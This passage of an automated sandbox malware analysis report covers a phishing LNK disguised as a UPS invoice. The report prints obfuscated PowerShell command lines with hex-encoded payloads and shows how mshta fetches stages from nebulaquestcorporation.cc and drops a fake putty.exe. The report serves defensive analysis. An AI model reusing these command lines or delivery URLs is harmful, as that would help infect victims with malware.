8CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function fwbfg($adskbak){return -split ($adskbak -replace '..', '0x$& ')};$jmnvemgx = fwbfg('21a646f03e7b8d0e0144ff5c4397d6e8768c751065483745f91bb8343ab048b2246e85d2c3339fcbd44e15dfb72afc02b9734d6a198b8c26999f960e241b32e123b9cbaca3b2719c1372506cbce2aa66a828088a6fb1394db34d592155f83047efcc0a4d824f80f7cf48d2bef262bb9d33aeed76c583d7d150e7bab97e9a8cfdf072921223bbac8034db6994987dc74dedc903018518b3f35e6537d8a19790bd95f0143b2b4b7e734d48a2b7acd50d6d344fcf97f4ee62251f59afeeb9cfbeac068b301cde9b6205c120f731d96bc22d1fc31d8efb7366a1b397c3feacff206d10806bd24c4b7e075e59e404fa575b579d4a6df851fa02f116a2f66f789fa93583b7a924750a4fcae28d9ac0876fee6a97b56a1c444b74cd5a3658ff272917b31d6bfd3c6eca76779b6869b431c03c81496affcded8fce4236fe3a29aba4886bca3096a535d941bdb706e590e88fa7706d01704c7206ea1993d9aeae980be84779168990e621b6ca14c201182fadbe2bad9e4daf1390f82e6e15665d552ac5d16e555e1a10fa71db534f2319ed67a298283d9d1a1751e92a4fcfb4d31f6a93918c158bdd7eabef8738964944f2614ad2e6956d5de3967b3dfe771c9b3d9ac0461e1de5472bab55be9c8660808b51c7080dfefd889feb39f30e08dcd5f153ca0e79a9bd1e25a9744bc9ba6f2d4ad161933bf97501242e37612d84b24a8c7848ddfbcc7a2c27befff04e49dbbc9b8747a32d22d665a58e7b75baf2bd3f1b99490f02f1cc81fe2ec80a4698ab32fd2ad22e0a57eb4582e03b221a46ab6f38b5479e296f8f998dd6d5168ddf6be6b26968f1bfac528412bb40bfa973a25189bf34f62af88628e5760f282273bd9bff02cdbba4d63c85b6432a4e0d9e278e71c030fc7deaad08193692a80fb945629de03029a101207c5f6ccd2f2a28646261eeefe0c2884b1e19245881c7f4019f40a3e6a22a4e0b908c58233f10bb8bd8761d051fefc7ca6830d169c4cdcff33b2ad164977b0ced54f545f0020ecbb4ee24b26829657385a8de80f60cba5d6b36691dfec61790cf77fe52269ed867dfa5120d6f6b6fb44cdfd99729b57b18279e84006c9697187cd589f4c6670b67313c0bc55d33b4d23d49761f9323e4b3e7611c1e68cca7234f6aaafcdf9910af8d82bb84b2a607c63a8b87f5f13f7e8a604b1ba722bd0e876b85a74d8b1827ef22e424dbbd1eb3b2cb9ee6a38003cea4c37d16615f536b1fff4b129e5612763b59a74ff64b2e06055b8b24f5b5b7ec633f0335f3071091d7ad4106436c236007b291cf7a546785aa4b12c6c6132447eba40f14cdc19ecbcee70c975c7d8f0578f7fcae5d8a2493c63ee1933513a538c7932c9e9c55084260fae910dfe4190287225ba380e3f6b468905db1e58629bb1a1b3c3296158a92830da5112af2f8e2277479fb9afe52ab07c3ba644bdd75957adb75241c6c23f95aca7af54f336ff6a8993c9d591e45cd5e243c46981298c82628286e0c5e331acdd58aa74dfd318e226aba7f7800f4a5f082919c70227fb9fc05b21083d3b9441d09666c4f983dfb7a8a821a080ff46f4a453a18a711c5ef4b13b318f99de6427f6659f80c64d4ff6966e2f33da9c9686f7e6cfd31d9e3d0aed7d73835a8c0c6222e3000d5f10c6285154e7086ff8eb7e9c110b4b86ce83c6f08fff8d327680fe10400da4ce7869dc78bcad4de74b35e05ed0b23917bd0f6a5851d6a5605d6bcb8ef5b938bb1527ee0a159be7290d623181bfc96809099d314a1ecdb5bfb518599ab82c48092ba1049836d235a7f5883f1ac30cc53712246af5f651de0907d59dc5b745cbf1210de92cdadeed7e1043b6c1f429df3cc959506e3a55b17614e807e23f46a911829d400434c9681dbb6a3a2a0bc95862391fb8ad4e829ab55bb8430c0ecd752bb561057de927805a181');$fcuyb
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function fwbfg($adskbak){return -split ($adskbak -replace '..', '0x$& ')};$jmnvemgx = fwbfg('21a646f03e7b8d0e0144ff5c4397d6e8768c751065483745f91bb8343ab048b2246e85d2c3339fcbd44e15dfb72afc02b9734d6a198b8c26999f960e241b32e123b9cbaca3b2719c1372506cbce2aa66a828088a6fb1394db34d592155f83047efcc0a4d824f80f7cf48d2bef262bb9d33aeed76c583d7d150e7bab97e9a8cfdf072921223bbac8034db6994987dc74dedc903018518b3f35e6537d8a19790bd95f0143b2b4b7e734d48a2b7acd50d6d344fcf97f4ee62251f59afeeb9cfbeac068b301cde9b6205c120f731d96bc22d1fc31d8efb7366a1b397c3feacff206d10806bd24c4b7e075e59e404fa575b579d4a6df851fa02f116a2f66f789fa93583b7a924750a4fcae28d9ac0876fee6a97b56a1c444b74cd5a3658ff272917b31d6bfd3c6eca76779b6869b431c03c81496affcded8fce4236fe3a29aba4886bca3096a535d941bdb706e590e88fa7706d01704c7206ea1993d9aeae980be84779168990e621b6ca14c201182fadbe2bad9e4daf1390f82e6e15665d552ac5d16e555e1a10fa71db534f2319ed67a298283d9d1a1751e92a4fcfb4d31f6a93918c158bdd7eabef8738964944f2614ad2e6956d5de3967b3dfe771c9b3d9ac0461e1de5472bab55be9c8660808b51c7080dfefd889feb39f30e08dcd5f153ca0e79a9bd1e25a9744bc9ba6f2d4ad161933bf97501242e37612d84b24a8c7848ddfbcc7a2c27befff04e49dbbc9b8747a32d22d665a58e7b75baf2bd3f1b99490f02f1cc81fe2ec80a4698ab32fd2ad22e0a57eb4582e03b221a46ab6f38b5479e296f8f998dd6d5168ddf6be6b26968f1bfac528412bb40bfa973a25189bf34f62af88628e5760f282273bd9bff02cdbba4d63c85b6432a4e0d9e278e71c030fc7deaad08193692a80fb945629de03029a101207c5f6ccd2f2a28646261eeefe0c2884b1e19245881c7f4019f40a3e6a22a4e0b908c58233f10bb8bd8761d051fefc7ca6830d169c4cdcff33b2ad164977b0ced54f545f0020ecbb4ee24b26829657385a8de80f60cba5d6b36691dfec61790cf77fe52269ed867dfa5120d6f6b6fb44cdfd99729b57b18279e84006c9697187cd589f4c6670b67313c0bc55d33b4d23d49761f9323e4b3e7611c1e68cca7234f6aaafcdf9910af8d82bb84b2a607c63a8b87f5f13f7e8a604b1ba722bd0e876b85a74d8b1827ef22e424dbbd1eb3b2cb9ee6a38003cea4c37d16615f536b1fff4b129e5612763b59a74ff64b2e06055b8b24f5b5b7ec633f0335f3071091d7ad4106436c236007b291cf7a546785aa4b12c6c6132447eba40f14cdc19ecbcee70c975c7d8f0578f7fcae5d8a2493c63ee1933513a538c7932c9e9c55084260fae910dfe4190287225ba380e3f6b468905db1e58629bb1a1b3c3296158a92830da5112af2f8e2277479fb9afe52ab07c3ba644bdd75957adb75241c6c23f95aca7af54f336ff6a8993c9d591e45cd5e243c46981298c82628286e0c5e331acdd58aa74dfd318e226aba7f7800f4a5f082919c70227fb9fc05b21083d3b9441d09666c4f983dfb7a8a821a080ff46f4a453a18a711c5ef4b13b318f99de6427f6659f80c64d4ff6966e2f33da9c9686f7e6cfd31d9e3d0aed7d73835a8c0c6222e3000d5f10c6285154e7086ff8eb7e9c110b4b86ce83c6f08fff8d327680fe10400da4ce7869dc78bcad4de74b35e05ed0b23917bd0f6a5851d6a5605d6bcb8ef5b938bb1527ee0a159be7290d623181bfc96809099d314a1ecdb5bfb518599ab82c48092ba1049836d235a7f5883f1ac30cc53712246af5f651de0907d59dc5b745cbf1210de92cdadeed7e1043b6c1f429df3cc959506e3a55b17614e807e23f46a911829d400434c9681dbb6a3a2a0bc95862391fb8ad4e829ab55bb8430c0ecd752bb561057de927805a181');$fcuyb Jump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678617130 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,12_2_00007FF678617130
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678617350 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,12_2_00007FF678617350
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,MsgWaitForMultipleObjects,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,12_2_00007FF6785D53E3
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,12_2_00007FF6786A9A14
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoA,DefWindowProcW,12_2_00007FF6785D1B9F
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,12_2_00007FF6786A9D30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00007FF6786A9FB8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF6786A9714
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,12_2_00007FF6786A2EDC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoW,12_2_00007FF6786A23A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67867B500 CreateNamedPipeA,CreateEventA,GetLastError,12_2_00007FF67867B500
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868B168 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FF67868B168
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864A3E0 GetProcAddress,GetUserNameA,GetUserNameA,12_2_00007FF67864A3E0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786B697C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,12_2_00007FF6786B697C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786179B0 GetVersionExA,GetProcAddress,12_2_00007FF6786179B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860FE90 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,12_2_00007FF67860FE90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860F930 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,12_2_00007FF67860F930

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		11
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		Boot or Logon Initialization Scripts12
Process Injection		12
Obfuscated Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares11
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook121
Masquerading		NTDS34
System Information Discovery		Distributed Component Object Model3
Clipboard Data		13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
Virtualization/Sandbox Evasion		LSA Secrets21
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Process Injection		Cached Domain Credentials11
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync31
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466029 Sample: Invoice-UPS-218931.pdf.lnk.... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 46 nebulaquestcorporation.cc 2->46 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Windows shortcut file (LNK) starts blacklisted processes 2->62 64 6 other signatures 2->64 12 forfiles.exe 1 2->12         started        15 svchost.exe 1 1 2->15         started        signatures3 process4 dnsIp5 72 Windows shortcut file (LNK) starts blacklisted processes 12->72 18 powershell.exe 7 12->18         started        21 conhost.exe 1 12->21         started        52 127.0.0.1 unknown unknown 15->52 signatures6 process7 signatures8 54 Windows shortcut file (LNK) starts blacklisted processes 18->54 56 Powershell drops PE file 18->56 23 mshta.exe 16 18->23         started        process9 dnsIp10 48 nebulaquestcorporation.cc 5.188.88.146, 443, 49705, 49708 PINDC-ASRU Russian Federation 23->48 42 C:\Users\user\AppData\...\invoiceupsstage[1], PE32 23->42 dropped 66 Windows shortcut file (LNK) starts blacklisted processes 23->66 68 Suspicious powershell command line found 23->68 70 Very long command line found 23->70 28 powershell.exe 17 18 23->28         started        file11 signatures12 process13 file14 44 C:\Users\user\AppData\Roaming\putty.exe, PE32+ 28->44 dropped 31 Acrobat.exe 63 28->31         started        33 putty.exe 28->33         started        35 conhost.exe 28->35         started        process15 process16 37 AcroCEF.exe 108 31->37         started        process17 39 AcroCEF.exe 4 37->39         started        dnsIp18 50 104.77.220.172, 443, 49723 AKAMAI-ASUS United States 39->50

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Invoice-UPS-218931.pdf.lnk.mal.lnk21%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\putty.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://nebulaquestcorporation.cc/cdnusa/putty.exe0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...80%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...w0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage60%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/putty.exep0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegs0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage100%Avira URL Cloudmalware
http://crl.ver)0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%VirustotalBrowse
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC:0%Avira URL Cloudsafe
https://g.live.com/odclientsettings/ProdV2/C:0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageH0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/inv0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMI0%Avira URL Cloudsafe
https://g.live.com/odclientsettings/ProdV2/C:0%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse
https://g.live.com/odclientsettings/Prod/C:0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf00%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%Avira URL Cloudsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGj0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...100%Avira URL Cloudmalware
https://nebulaquestcorporation.cc0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:?0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC:0%Avira URL Cloudsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0%VirustotalBrowse
https://g.live.com/odclientsettings/Prod/C:0%VirustotalBrowse
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage.100%Avira URL Cloudmalware
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%VirustotalBrowse
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagero0%Avira URL Cloudsafe
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I100%Avira URL Cloudmalware
https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#M0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nebulaquestcorporation.cc
5.188.88.146
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://nebulaquestcorporation.cc/cdnusa/putty.exefalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdffalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagetrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://sectigo.com/CPS0powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...8mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
